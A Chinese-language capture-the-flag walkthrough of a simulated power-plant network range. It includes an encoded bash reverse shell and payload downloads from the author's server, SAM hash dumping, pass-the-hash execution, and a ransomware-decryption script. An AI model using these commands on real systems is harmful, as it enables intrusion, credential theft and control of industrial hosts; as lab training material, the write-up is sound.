春秋云境 ThermalPower
111
Last updated
111
Last updated
该场景模拟仿真了电力生产企业的部分业务场景。“火创能源” 公司在未充分重视网络安全的威胁的情况下,将敏感区域的服务错误地配置在公网上,使得外部的 APT 组织可以轻松地访问这些服务,最终导致控制电力分配、生产流程和其他关键设备的服务遭受攻击,并部署了勒索病毒。 玩家的任务是分析 APT 组织的渗透行为,按照关卡列表恢复其攻击路径,并对勒索病毒加密的文件进行解密
关卡剧情:
评估暴露在公网的服务的安全性,尝试建立通向生产区的立足点得到靶机先用fscan扫一下
可以看到8080端口
可以检查看出具有shiro框架特征
同时你扫描看到/actuator/heapdump文件泄露,利用工具(https://github.com/whwlsfb/JDumpSpider/releases)分析heapdump文件,获取shiro的key
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdumpCookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES这里选择反弹shell到我的香港服务器
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOC41NS45OS4xNzkvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}'关卡剧情:
尝试接管 SCADA 工程师的个人 PC,并通过滥用 Windows 特权组提升至系统权限然后就是上传一个fscan和stowaway(https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2)
cd /tmp
wget http://38.55.99.xxx/fscan
wget http://38.55.99.xxx/linux_x64_agent
chmod +x *root@security:/tmp# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.17.213 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe38:eec4 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:38:ee:c4 txqueuelen 1000 (Ethernet)
RX packets 74686 bytes 99914210 (99.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24809 bytes 33634693 (33.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 608 bytes 51983 (51.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 608 bytes 51983 (51.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@security:/tmp# ./fscan -h 172.22.17.213/24
./fscan -h 172.22.17.213/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.6:21 open
172.22.17.213:8080 open
172.22.17.6:80 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.213:22 open
[*] alive ports len is: 7
start vulscan
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=8FAC38FB81A8F630687436CF16FBF1B6
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=8FAC38FB81A8F630687436CF16FBF1B6 code:200 len:2936 title:火创能源监控画面管理平台
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2然后利用stowaway做内网代理
把admin放在服务器上面,agent放在靶机上面
服务器:./linux_x64_admin -l 1234 -s 123
靶机:./linux_x64_agent -c 39.107.115.xxx:1234 -s 123 --reconnect 8use 0
socks 5555建立好了内网通信利用我们服务器可以通信到内往来1,利用proxifier建立一个全局代理,这样我们就可以在本地去访问到内网资源了
如果你要用虚拟机的话,记得修改代理配置文件
sudo vim /etc/proxychains4.conf
最后一行
socks xxx.xxx.xxx.xxx 5555配置好之后就可以在本地浏览器看到了,这里有个匿名的ftp,也可以直接用ftp去连接,我这里是直接访问了
/SCADA.txt
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3把资料都下载下来,从这个提示可以看出还有一个网段,在用fscan扫一下
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:139 open
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:135 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
给他数据库弱密码都爆出来了内部员工通讯录.xlsx中获取到员工信息:
获取到默认密码规则:
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6先远程连接一下172.22.17.6,要用SCADA工程师的账号
chenhua
chenhua@0813本来想查看文件发现权限不足,要求是admin身份,那就管理员身份运行cmd查看权限
C:\Windows\system32> whoami
win-engineer\chenhua
C:\Windows\system32> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ============== ======
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用存储sam&system注册表
C:\Users\chenhua\Desktop> reg save hklm\sam sam.hive
操作成功完成。
C:\Users\chenhua\Desktop> reg save hklm\system system.hive
操作成功完成。使用 impacket-secretsdump 从注册表转储文件中获取 ntlm 哈希:
root@kali-server:~# impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
[*] Cleaning up...利用管理员的hash去攻击
root@kali-server:~# proxychains4 -q nxc smb 172.22.17.6 -u Administrator -H f82292b7ac79b05d5b0e3d302bd0d279
SMB 172.22.17.6 445 WIN-ENGINEER [*] Windows 10.0 Build 20348 x64 (name:WIN-ENGINEER) (domain:WIN-ENGINEER) (signing:False) (SMBv1:False)
SMB 172.22.17.6 445 WIN-ENGINEER [+] WIN-ENGINEER\Administrator:f82292b7ac79b05d5b0e3d302bd0d279 (Pwn3d!)
root@kali-server:~# proxychains4 -q nxc smb 172.22.17.6 -u Administrator -H f82292b7ac79b05d5b0e3d302bd0d279 -X 'type ~/flag/flag02.txt'
SMB 172.22.17.6 445 WIN-ENGINEER [*] Windows 10.0 Build 20348 x64 (name:WIN-ENGINEER) (domain:WIN-ENGINEER) (signing:False) (SMBv1:False)
SMB 172.22.17.6 445 WIN-ENGINEER [+] WIN-ENGINEER\Administrator:f82292b7ac79b05d5b0e3d302bd0d279 (Pwn3d!)
SMB 172.22.17.6 445 WIN-ENGINEER [+] Executed command via wmiexec
SMB 172.22.17.6 445 WIN-ENGINEER _____.__ _______ ________
SMB 172.22.17.6 445 WIN-ENGINEER _/ ____\ | _____ ____ \ _ \ \_____ \
SMB 172.22.17.6 445 WIN-ENGINEER \ __\| | \__ \ / ___\/ /_\ \ / ____/
SMB 172.22.17.6 445 WIN-ENGINEER | | | |__/ __ \_/ /_/ > \_/ \/ \
SMB 172.22.17.6 445 WIN-ENGINEER |__| |____(____ /\___ / \_____ /\_______ \
SMB 172.22.17.6 445 WIN-ENGINEER \//_____/ \/ \/
SMB 172.22.17.6 445 WIN-ENGINEER
SMB 172.22.17.6 445 WIN-ENGINEER
SMB 172.22.17.6 445 WIN-ENGINEER flag02: flag{cd0f626c-d89d-4d86-8a34-c05fabce7b51}关卡剧情:
尝试接管 SCADA 工程师站,并启动锅炉远程连接后扫出来的网段
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11连接的账号密码就是这个
/SCADA.txt
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3打开锅炉得到一个flag3
关卡剧情:
尝试获取 SCADA 工程师站中的数据库备份,并分析备份文件是否泄漏了敏感数据win+D返回桌面,发现出现勒索病毒
在桌面中查看到一个被加密的文件 ScadaDB.sql.locky
然后在c盘看到勒索exe文件
放进 dnSpy 分析程序,该程序使用了 AES 加密文件
最一开始网盘给的encryptedAesKey 和 privateKey 文件,将给的题目附件去解密
对于这个RSA我们先把XML转pem https://www.ssleye.com/ssltool/pem_xml.html
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----有了私钥再去解RSA https://www.lddgo.net/encrypt/rsa
最后得到
cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=最后的解密脚本
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
# 读取加密文件内容
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
encrypted_data = file.read()
# 解密密钥
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)
# 按照每 16 位数据作为 IV 进行解密
iv = encrypted_data[:16]
# 创建 AES 解密器
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
# 解密数据(去除 IV 后的部分)
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)
# 写入解密后的内容到新文件
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
file.write(decrypted_data)
print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')得到flag4
拿下徽章
